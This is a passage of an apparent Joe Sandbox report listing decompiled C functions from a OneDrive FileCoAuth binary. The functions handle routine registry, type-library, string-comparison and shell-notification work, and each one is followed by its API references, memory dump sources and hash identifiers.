							_t39 = GetModuleHandleW(L"OLEAUT32.DLL");
							if(_t39 == 0) {
								goto L5;
							} else {
								_t49 = GetProcAddress(_t39, "UnRegisterTypeLibForUser");
								if(_t49 == 0) {
									goto L5;
								}
							}
						}
						_t47 = _v20;
						_t36 =  *_t49(_t47,  *(_t47 + 0x18) & 0x0000ffff,  *(_t47 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t47 + 0x10)),  *((intOrPtr*)(_t47 + 0x14)));
						_t51 = _t36;
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 0x30))(_t37, _v20);
					}
				}
				_t28 = _v12;
				if(_t28 != 0) {
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				__imp__#6();
				return E00EA29F2(_t41, _v8 ^ _t52, _t49, _t50, _t51, _v16);
			}




















    0x00e928a9
    0x00e928a9
    0x00e928b1
    0x00e928b8
    0x00e928bb
    0x00e928c2
    0x00e928cc
    0x00e928d1
    0x00e928d5
    0x00e928d7
    0x00e928da
    0x00e928e1
    0x00e928e4
    0x00e928e8
    0x00e928f1
    0x00e92914
    0x00e92914
    0x00e928f3
    0x00e928f8
    0x00e92900
    0x00000000
    0x00e92902
    0x00e9290e
    0x00e92912
    0x00000000
    0x00000000
    0x00e92912
    0x00e92900
    0x00e9291a
    0x00e9292e
    0x00e92933
    0x00e92935
    0x00e9293b
    0x00e9293b
    0x00e928e8
    0x00e9293e
    0x00e92943
    0x00e92948
    0x00e92948
    0x00e9294e
    0x00e92964

    APIs
      • Part of subcall function 00E923DD: GetModuleFileNameW.KERNEL32(00E90000,?,00000104,Dv), ref: 00E92424
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00E928F8
    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E92908
    • SysFreeString.OLEAUT32(00000000), ref: 00E9294E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Module$AddressFileFreeHandleNameProcString
    • String ID: Dv$OLEAUT32.DLL$UnRegisterTypeLibForUser
    • API String ID: 815855407-210564437
    • Opcode ID: 8a60994088e18e840e44f50c5e74f0db1ed0e0a29de38f38ae6bbaad22e6b6f9
    • Instruction ID: 11b62fa77aba3ce167d4146fba5cd72f5b65f11fe7bad45bab32e633f4578d32
    • Opcode Fuzzy Hash: 8a60994088e18e840e44f50c5e74f0db1ed0e0a29de38f38ae6bbaad22e6b6f9
    • Instruction Fuzzy Hash: 40219D71A00219AFCF14DFA5CC44AAE7BB8AF89304F14419CE941FB251DB35ED4ADB60
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E94721, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67COMMON
    Download Yara Rule
    C-Code - Quality: 48%
    			E00E94721(void* __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr _t43;
				intOrPtr _t47;
				void* _t53;

				_t52 = __esi;
				_t50 = __edi;
				_push(0x4c);
				E00EA3194(E00EA37C0, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t53 - 0x58)) = __ecx;
				 *((intOrPtr*)(_t53 - 0x50)) =  *((intOrPtr*)(_t53 + 0xc));
				_t30 =  *((intOrPtr*)(_t53 + 0x10));
				 *((intOrPtr*)(_t53 - 0x54)) = _t30;
				if(_t30 != 0) {
					_t43 = 0;
					 *_t30 = 0;
					asm("stosd");
					_push(_t53 - 0x4c);
					asm("stosd");
					asm("stosd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)))) + 0x10))();
					 *((intOrPtr*)(_t53 - 4)) = 0;
					_t52 =  *((intOrPtr*)(_t53 - 0x4c));
					_t50 =  *((intOrPtr*)(_t53 - 0x48));
					while(_t52 != _t50) {
						_t43 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t53 - 0x58)))) + 8))(_t52,  *((intOrPtr*)(_t53 + 8)),  *((intOrPtr*)(_t53 - 0x50)),  *((intOrPtr*)(_t53 - 0x54)));
						if(_t43 >= 0) {
							_t47 = 3;
							 *((intOrPtr*)(_t53 - 0x38)) =  *((intOrPtr*)(_t53 + 8));
							 *(_t53 - 0x3c) = "propertyType";
							 *((intOrPtr*)(_t53 - 0x40)) = _t47;
							 *((intOrPtr*)(_t53 - 0x24)) = "hr";
							 *((intOrPtr*)(_t53 - 0x28)) = _t47;
							 *((intOrPtr*)(_t53 - 0x20)) = _t43;
							__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\24\\client\\onedrive\\product\\filecoauth\\filecoauth\\storageproviderfinder.cpp", 0x34, "StorageProviderFinder::RetrievePropertyHandlerByCheckingAllAccounts", 0xea7810, 0x882e191b, 1, 2, _t53 - 0x40);
							__imp__?LoggingRotateIfNeeded@@YGXXZ();
						} else {
							_t52 = _t52 + 0x11c;
							continue;
						}
						L8:
						E00E949AF(_t53 - 0x4c);
						goto L9;
					}
					goto L8;
				} else {
				}
				L9:
				return E00EA3152(_t43, _t50, _t52);
			}







    0x00e94721
    0x00e94721
    0x00e94721
    0x00e94728
    0x00e9472d
    0x00e94733
    0x00e94736
    0x00e94739
    0x00e9473e
    0x00e9474a
    0x00e9474f
    0x00e94759
    0x00e9475a
    0x00e9475b
    0x00e9475c
    0x00e9475f
    0x00e94762
    0x00e94765
    0x00e94768
    0x00e9478b
    0x00e9477f
    0x00e94783
    0x00e94796
    0x00e94797
    0x00e947b8
    0x00e947bf
    0x00e947c2
    0x00e947c9
    0x00e947cc
    0x00e947cf
    0x00e947d5
    0x00e94785
    0x00e94785
    0x00000000
    0x00e94785
    0x00e947db
    0x00e947de
    0x00000000
    0x00e947e3
    0x00000000
    0x00e94740
    0x00e94740
    0x00e947e5
    0x00e947ea

    APIs
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E947B3
    • StorageProviderFinder::RetrievePropertyHandlerByCheckingAllAccounts, xrefs: 00E947AC
    • x, xrefs: 00E947B8
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_
    • String ID: x$StorageProviderFinder::RetrievePropertyHandlerByCheckingAllAccounts$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2427045233-3770737364
    • Opcode ID: 83b4192d5ab327114f5de630fd9d9b28f2363949389097073c8acc6b8d7a5717
    • Instruction ID: dec8a72247bad8575221dce253066d4c4329d92ba9277a07f2764ecb4eabf6af
    • Opcode Fuzzy Hash: 83b4192d5ab327114f5de630fd9d9b28f2363949389097073c8acc6b8d7a5717
    • Instruction Fuzzy Hash: 922114B5A04208ABDB05DFE8C8859DDBBB1BF5A300F10542AF915BF291D775A906CB44
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E922DF, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00E922DF(void** __ecx, char _a4) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t9;

				_t13 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					if( *0xeb2338 != 0) {
						_t6 =  *0xeb1748; // 0x0
					} else {
						_t9 = GetModuleHandleW(L"Advapi32.dll");
						if(_t9 == 0) {
							_t6 =  *0xeb1748; // 0x0
						} else {
							_t6 = GetProcAddress(_t9, "RegDeleteKeyExW");
							 *0xeb1748 = _t6;
						}
						 *0xeb2338 = 1;
					}
					if(_t6 == 0) {
						_t5 =  &_a4; // 0xe92862
						return RegDeleteKeyW( *_t13,  *_t5);
					} else {
						_t4 =  &_a4; // 0xe92862
						return  *_t6( *_t13,  *_t4, _t13[1], 0);
					}
				}
				_t2 =  &_a4; // 0xe92862
				return E00E91F75(_t12,  *((intOrPtr*)(__ecx)),  *_t2);
			}





    0x00e922e5
    0x00e922e7
    0x00e922ec
    0x00e92301
    0x00e92333
    0x00e92303
    0x00e92308
    0x00e92310
    0x00e92325
    0x00e92312
    0x00e92318
    0x00e9231e
    0x00e9231e
    0x00e9232a
    0x00e9232a
    0x00e9233a
    0x00e9234a
    0x00000000
    0x00e9233c
    0x00e92341
    0x00000000
    0x00e92346
    0x00e9233a
    0x00e922ee
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,00E92862,?), ref: 00E92308
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E92318
      • Part of subcall function 00E91F75: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F89
      • Part of subcall function 00E91F75: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00E91F99
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyExW$b(
    • API String ID: 1646373207-2031347862
    • Opcode ID: 2bce2db269d725b1f92ecd6fa48a422125db993009ab78a74d1ae2fd38b10128
    • Instruction ID: 2587300d9cd0e1320b3aac118841ab000934446cb5a862f2f558abbaaccb7a09
    • Opcode Fuzzy Hash: 2bce2db269d725b1f92ecd6fa48a422125db993009ab78a74d1ae2fd38b10128
    • Instruction Fuzzy Hash: 75018F35204206FFDF218F52DC84F963BE5EF0E750B68645DF646B2130CB35A988A750
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92237, Relevance: 9.1, APIs: 6, Instructions: 76COMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00E92237(signed short* __ecx, WCHAR* __edx) {
				WCHAR* _v8;
				signed int _t9;
				void* _t10;
				WCHAR* _t19;
				void* _t22;
				void* _t24;
				signed int _t29;
				WCHAR* _t31;

				_push(__ecx);
				_t19 = __edx;
				_v8 = __ecx;
				_t29 = CharUpperW( *__ecx & 0x0000ffff) & 0x0000ffff;
				_t9 = CharUpperW( *_t19 & 0x0000ffff) & 0x0000ffff;
				_t24 = 0x20;
				_t22 = 9;
				if(_t29 == 0) {
					L8:
					if(_t9 == 0 || _t9 == _t24 || _t9 == _t22) {
						_t10 = 0;
					} else {
						goto L11;
					}
				} else {
					while(_t29 == _t9 && _t29 != _t24 && _t29 != _t22) {
						_t31 = CharNextW(_v8);
						_v8 = _t31;
						_t19 = CharNextW(_t19);
						_t29 = CharUpperW( *_t31 & 0x0000ffff) & 0x0000ffff;
						_t9 = CharUpperW( *_t19 & 0x0000ffff) & 0x0000ffff;
						_t22 = 9;
						_t24 = 0x20;
						if(_t29 != 0) {
							continue;
						}
						break;
					}
					if(_t29 == 0 || _t29 == _t24 || _t29 == _t22) {
						goto L8;
					} else {
						L11:
						asm("sbb eax, eax");
						_t10 = (_t9 & 0xfffffffe) + 1;
					}
				}
				return _t10;
			}











    0x00e9223c
    0x00e92240
    0x00e9224a
    0x00e92253
    0x00e9225c
    0x00e92261
    0x00e92264
    0x00e92268
    0x00e922bc
    0x00e922bf
    0x00e922d6
    0x00000000
    0x00000000
    0x00000000
    0x00e9226a
    0x00e9226a
    0x00e92282
    0x00e92285
    0x00e9228e
    0x00e92296
    0x00e9229f
    0x00e922a4
    0x00e922a7
    0x00e922ab
    0x00000000
    0x00000000
    0x00000000
    0x00e922ab
    0x00e922b0
    0x00000000
    0x00e922cb
    0x00e922cb
    0x00e922ce
    0x00e922d3
    0x00e922d3
    0x00e922b0
    0x00e922de

    APIs
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Char$Upper$Next
    • String ID:
    • API String ID: 3006421506-0
    • Opcode ID: f16739db7309eebe1fdf2626057e152bcf4bff661f37ae9f520a713980fb43ba
    • Instruction ID: cc0c1a5edaa9bf894798d854a04d716315ec2b619b8705e09b654189e7c46ad8
    • Opcode Fuzzy Hash: f16739db7309eebe1fdf2626057e152bcf4bff661f37ae9f520a713980fb43ba
    • Instruction Fuzzy Hash: 8D11062A1002207FCF3097BA6C086B5B2D8EF9AB29BA4116FFE40F31A0E1658D855221
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9F489, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
    Download Yara Rule
    C-Code - Quality: 34%
    			E00E9F489(long _a4, int _a8, void* _a12, intOrPtr _a16) {
				void* _v8;
				void _v600;
				void* __ebx;
				void* __ebp;
				void* _t20;
				void* _t25;
				void* _t33;
				void* _t34;

				_t38 = _a12;
				if(_a12 == 0) {
					return _t20;
				}
				memset( &_v600, 0, 0x250);
				_push( &_v8);
				_push(_a12);
				_push( &_v600);
				_t25 = E00E9EE33(0x250, _t33, _t34, _t38);
				if(_t25 >= 0) {
					_t40 = _a16;
					if(_a16 == 0) {
						SHChangeNotify(_a4, _a8, _v8, 0);
					} else {
						memset( &_v600, 0, 0x250);
						_push( &_a12);
						_push(_a16);
						_push( &_v600);
						_t25 = E00E9EE33(0x250, _t33, _t34, _t40);
						if(_t25 >= 0) {
							SHChangeNotify(_a4, _a8, _v8, _a12);
							__imp__CoTaskMemFree(_a12);
						}
					}
					__imp__CoTaskMemFree(_v8);
				}
				return _t25;
			}











    0x00e9f494
    0x00e9f498
    0x00e9f537
    0x00e9f537
    0x00e9f4ae
    0x00e9f4b9
    0x00e9f4ba
    0x00e9f4c3
    0x00e9f4c4
    0x00e9f4cb
    0x00e9f4cd
    0x00e9f4d1
    0x00e9f524
    0x00e9f4d3
    0x00e9f4dd
    0x00e9f4e8
    0x00e9f4e9
    0x00e9f4f2
    0x00e9f4f3
    0x00e9f4fa
    0x00e9f508
    0x00e9f511
    0x00e9f511
    0x00e9f4fa
    0x00e9f52d
    0x00e9f52d
    0x00000000

    APIs
    • memset.MSVCR120 ref: 00E9F4AE
      • Part of subcall function 00E9EE33: __EH_prolog3.LIBCMT ref: 00E9EE3A
      • Part of subcall function 00E9EE33: SHParseDisplayName.SHELL32(?,00000000,00000000,00000000,00000000), ref: 00E9EE6E
    • memset.MSVCR120 ref: 00E9F4DD
    • SHChangeNotify.SHELL32(?,?,?,00000000), ref: 00E9F508
    • CoTaskMemFree.OLE32(00000000), ref: 00E9F511
    • SHChangeNotify.SHELL32(?,?,?,00000000), ref: 00E9F524
    • CoTaskMemFree.OLE32(?), ref: 00E9F52D
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ChangeFreeNotifyTaskmemset$DisplayH_prolog3NameParse
    • String ID:
    • API String ID: 44509295-0
    • Opcode ID: 84d781c9a373e27e761bbf700cabee77f2d55b2be61c17da6c8853562d29b351
    • Instruction ID: bd18437f43fd47eff5b09b6a5566d8021ac363984c7921720c849c5f28ff9335
    • Opcode Fuzzy Hash: 84d781c9a373e27e761bbf700cabee77f2d55b2be61c17da6c8853562d29b351
    • Instruction Fuzzy Hash: 50112B7280010EFBDF11AFA0DD49F9A7B7DFB49305F040061FA14A1061E775AB69EB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA2346, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 262COMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E00EA2346(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t125;
				void* _t138;
				signed int _t172;
				signed int _t173;
				signed int _t177;
				intOrPtr* _t200;
				void* _t204;
				intOrPtr* _t206;
				intOrPtr _t209;
				intOrPtr _t211;
				void* _t212;
				void* _t213;

				_t213 = __eflags;
				_t204 = __edx;
				_push(0x88);
				E00EA3194(E00EA56D3, __ebx, __edi, __esi);
				_t206 =  *((intOrPtr*)(_t212 + 8));
				 *((intOrPtr*)(_t212 - 0x90)) =  *((intOrPtr*)(_t212 + 0xc));
				 *((intOrPtr*)(_t212 - 0x94)) =  *((intOrPtr*)(_t212 + 0x18));
				E00E94E9D(_t212 - 0x88, L"Software\\Classes\\CLSID\\");
				 *(_t212 - 4) =  *(_t212 - 4) & 0x00000000;
				E00E95904(_t212 - 0x88,  *((intOrPtr*)(_t212 + 0xc)), 0, 0xffffffff);
				_t209 =  *0xeb0078; // 0xea6fb0
				E00E98198(_t212 - 0x88, _t213, _t209, E00E94E74(_t209));
				 *((intOrPtr*)(_t212 - 0x48)) = 0;
				 *((intOrPtr*)(_t212 - 0x44)) = 0;
				 *((intOrPtr*)(_t212 - 0x44)) = 7;
				 *((intOrPtr*)(_t212 - 0x48)) = 0;
				 *((short*)(_t212 - 0x58)) = 0;
				 *(_t212 - 4) = 1;
				if( *((intOrPtr*)(_t212 + 0x10)) == 0 ||  *((intOrPtr*)(_t212 + 0x14)) != 0) {
					E00E94E9D(_t212 - 0x40,  *0xeb0080);
					 *(_t212 - 4) = 3;
					_t210 =  *((intOrPtr*)(_t212 + 0x1c));
					_t125 = E00E9F290(0x80000001, _t212 - 0x88, _t212 - 0x40,  *((intOrPtr*)(_t212 + 0x1c)), _t212 - 0x58);
					__eflags = _t125;
					_t172 = 0 | _t125 > 0x00000000;
					 *(_t212 - 4) = 1;
					E00E94307(_t212 - 0x40, 1, 0);
					__eflags = _t172;
					if(_t172 == 0) {
						goto L15;
					}
					__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 8;
					if( *((intOrPtr*)(_t206 + 0x14)) >= 8) {
						_t206 =  *_t206;
					}
					_push(1);
					_push(0xffffffff);
					_push(_t206);
					goto L8;
				} else {
					E00E94E9D(_t212 - 0x40,  *0xeb0084);
					 *(_t212 - 4) = 2;
					_t210 =  *((intOrPtr*)(_t212 + 0x1c));
					_t172 = 0 | E00E9F290(0x80000001, _t212 - 0x88, _t212 - 0x40,  *((intOrPtr*)(_t212 + 0x1c)), _t212 - 0x58) > 0x00000000;
					 *(_t212 - 4) = 1;
					E00E94307(_t212 - 0x40, 1, 0);
					if(_t172 == 0) {
						L15:
						 *((char*)(_t212 - 0x89)) = 1;
						if(_t172 != 0) {
							L20:
							_t173 = 1;
							L21:
							 *(_t212 - 4) = 0;
							E00E94307(_t212 - 0x58, 1, 0);
							 *(_t212 - 4) =  *(_t212 - 4) | 0xffffffff;
							E00E94307(_t212 - 0x88, 1, 0);
							return E00EA3152(_t173, _t206, _t210);
						}
						E00E94E9D(_t212 - 0x40,  *0xeb0070);
						 *(_t212 - 4) = 8;
						E00E95904(_t212 - 0x40,  *((intOrPtr*)(_t212 - 0x90)), 0, 0xffffffff);
						 *((intOrPtr*)(_t212 - 0x18)) = 0;
						 *((intOrPtr*)(_t212 - 0x14)) = 0;
						 *((intOrPtr*)(_t212 - 0x14)) = 7;
						 *((intOrPtr*)(_t212 - 0x18)) = 0;
						 *((short*)(_t212 - 0x28)) = 0;
						 *(_t212 - 4) = 9;
						E00E94E9D(_t212 - 0x70, 0xea7340);
						 *(_t212 - 4) = 0xa;
						_t138 = E00E9F290(0x80000001, _t212 - 0x40, _t212 - 0x70, _t210, _t212 - 0x28);
						 *(_t212 - 4) = 9;
						E00E94307(_t212 - 0x70, 1, 0);
						if((0 | _t138 > 0x00000000) != 0) {
							 *((char*)(_t212 - 0x89)) =  *((intOrPtr*)(_t212 - 0x18)) == 0;
						}
						 *(_t212 - 4) = 8;
						E00E94307(_t212 - 0x28, 1, 0);
						 *(_t212 - 4) = 1;
						E00E94307(_t212 - 0x40, 1, 0);
						if( *((char*)(_t212 - 0x89)) != 0) {
							goto L20;
						} else {
							_t173 = 0;
							goto L21;
						}
					}
					_push(1);
					_push(0xffffffff);
					_push(L"{a52bba46-e9e1-435f-b3d9-28daa648c0f6}");
					L8:
					_t206 = __imp__CompareStringOrdinal;
					_t143 =  >=  ?  *((void*)(_t212 - 0x58)) : _t212 - 0x58;
					_t172 = _t172 & 0xffffff00 |  *_t206( >=  ?  *((void*)(_t212 - 0x58)) : _t212 - 0x58, 0xffffffff) != 0x00000002;
					_t220 = _t172;
					if(_t172 == 0) {
						 *((intOrPtr*)(_t212 - 0x18)) = 0;
						 *((intOrPtr*)(_t212 - 0x14)) = 0;
						 *((intOrPtr*)(_t212 - 0x14)) = 7;
						 *((intOrPtr*)(_t212 - 0x18)) = 0;
						 *((short*)(_t212 - 0x28)) = 0;
						 *(_t212 - 4) = 4;
						E00E94E9D(_t212 - 0x40, L"Software\\Classes\\CLSID\\");
						 *(_t212 - 4) = 5;
						E00E95904(_t212 - 0x40,  *((intOrPtr*)(_t212 - 0x90)), 0, 0xffffffff);
						_t211 =  *0xeb006c; // 0xea6ea4
						E00E98198(_t212 - 0x40, _t220, _t211, E00E94E74(_t211));
						E00E94E9D(_t212 - 0x70, 0xea7340);
						 *(_t212 - 4) = 6;
						_t210 =  *((intOrPtr*)(_t212 + 0x1c));
						_t177 = 0 | E00E9F290(0x80000001, _t212 - 0x40, _t212 - 0x70,  *((intOrPtr*)(_t212 + 0x1c)), _t212 - 0x28) > 0x00000000;
						 *(_t212 - 4) = 5;
						E00E94307(_t212 - 0x70, 1, 0);
						_t222 = _t177;
						if(_t177 == 0) {
							_t172 = 1;
						} else {
							_push(1);
							_push( *((intOrPtr*)(_t212 - 0x94)));
							_push(_t212 - 0x70);
							_t200 = E00EA16B7(_t177, _t204, _t206, _t210, _t222);
							 *(_t212 - 4) = 7;
							if( *((intOrPtr*)(_t200 + 0x14)) >= 8) {
								_t200 =  *_t200;
							}
							_t161 =  >=  ?  *((void*)(_t212 - 0x28)) : _t212 - 0x28;
							_t172 = _t177 & 0xffffff00 |  *_t206( >=  ?  *((void*)(_t212 - 0x28)) : _t212 - 0x28, 0xffffffff, _t200, 0xffffffff, 1) != 0x00000002;
							 *(_t212 - 4) = 5;
							E00E94307(_t212 - 0x70, 1, 0);
						}
						 *(_t212 - 4) = 4;
						E00E94307(_t212 - 0x40, 1, 0);
						 *(_t212 - 4) = 1;
						E00E94307(_t212 - 0x28, 1, 0);
					}
					goto L15;
				}
			}















    0x00ea2346
    0x00ea2346
    0x00ea2346
    0x00ea2350
    0x00ea2363
    0x00ea236b
    0x00ea2371
    0x00ea2377
    0x00ea237c
    0x00ea238b
    0x00ea2390
    0x00ea23a5
    0x00ea23ac
    0x00ea23af
    0x00ea23b2
    0x00ea23b9
    0x00ea23bc
    0x00ea23c0
    0x00ea23c6
    0x00ea242c
    0x00ea2431
    0x00ea2438
    0x00ea244d
    0x00ea2452
    0x00ea2454
    0x00ea2457
    0x00ea2462
    0x00ea2467
    0x00ea2469
    0x00000000
    0x00000000
    0x00ea246f
    0x00ea2473
    0x00ea2475
    0x00ea2475
    0x00ea2477
    0x00ea2479
    0x00ea247b
    0x00000000
    0x00ea23cd
    0x00ea23d6
    0x00ea23db
    0x00ea23e2
    0x00ea23fe
    0x00ea2401
    0x00ea240b
    0x00ea2412
    0x00ea25a7
    0x00ea25a7
    0x00ea25b0
    0x00ea266e
    0x00ea266e
    0x00ea2670
    0x00ea2670
    0x00ea267b
    0x00ea2680
    0x00ea268e
    0x00ea269a
    0x00ea269a
    0x00ea25bf
    0x00ea25c4
    0x00ea25d6
    0x00ea25dd
    0x00ea25e0
    0x00ea25e3
    0x00ea25ea
    0x00ea25ed
    0x00ea25f1
    0x00ea25fd
    0x00ea2602
    0x00ea2618
    0x00ea2622
    0x00ea262d
    0x00ea2634
    0x00ea263a
    0x00ea263a
    0x00ea2641
    0x00ea264c
    0x00ea2651
    0x00ea265c
    0x00ea2668
    0x00000000
    0x00ea266a
    0x00ea266a
    0x00000000
    0x00ea266a
    0x00ea2668
    0x00ea2418
    0x00ea241a
    0x00ea241c
    0x00ea247c
    0x00ea2483
    0x00ea2489
    0x00ea2495
    0x00ea2498
    0x00ea249a
    0x00ea24a4
    0x00ea24a7
    0x00ea24aa
    0x00ea24b1
    0x00ea24b4
    0x00ea24b8
    0x00ea24c4
    0x00ea24c9
    0x00ea24d9
    0x00ea24de
    0x00ea24f0
    0x00ea24fd
    0x00ea2502
    0x00ea2509
    0x00ea2522
    0x00ea2525
    0x00ea2530
    0x00ea2535
    0x00ea2537
    0x00ea2585
    0x00ea2539
    0x00ea2539
    0x00ea253b
    0x00ea2544
    0x00ea254a
    0x00ea254c
    0x00ea2554
    0x00ea2556
    0x00ea2556
    0x00ea2561
    0x00ea2570
    0x00ea2573
    0x00ea257e
    0x00ea257e
    0x00ea2587
    0x00ea2592
    0x00ea2597
    0x00ea25a2
    0x00ea25a2
    0x00000000
    0x00ea249a

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA2350
      • Part of subcall function 00E95904: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
      • Part of subcall function 00E95904: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
    • CompareStringOrdinal.KERNEL32(?,000000FF,?,000000FF,00000001,00000001,00000000,00EA6FB0,00000000,?,00000000,000000FF,Software\Classes\CLSID\,00000088,00EA26BC,?), ref: 00EA2490
    • CompareStringOrdinal.KERNEL32(?,000000FF,00000000,000000FF,00000001,?,?,00000001,00000001,00000000,00EA7340,00EA6EA4,00000000,?,00000000,000000FF), ref: 00EA256B
      • Part of subcall function 00E9F290: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00E9F2D9
      • Part of subcall function 00E9F290: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 00E9F328
      • Part of subcall function 00E9F290: RegCloseKey.ADVAPI32(?), ref: 00E9F374
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CompareOrdinalString$??3@CloseH_prolog3_OpenQueryValueXlength_error@std@@Xout_of_range@std@@
    • String ID: Software\Classes\CLSID\${a52bba46-e9e1-435f-b3d9-28daa648c0f6}
    • API String ID: 3309761805-4174548148
    • Opcode ID: 3ce2004919aa4c23a9850aed65ff8335e68dd690496a27acce8879a53f5d1b30
    • Instruction ID: 6fbe1bde3801732f636c20cbe3af0999ad5208cf0e9169d14dc24dd73e0c9db4
    • Opcode Fuzzy Hash: 3ce2004919aa4c23a9850aed65ff8335e68dd690496a27acce8879a53f5d1b30
    • Instruction Fuzzy Hash: D7A1AD71901258EEDF11DBA4CC46FEDBBB4BF1A314F241198E614BB1C2DBB06A49CB61
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E98B58, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215COMMON
    Download Yara Rule
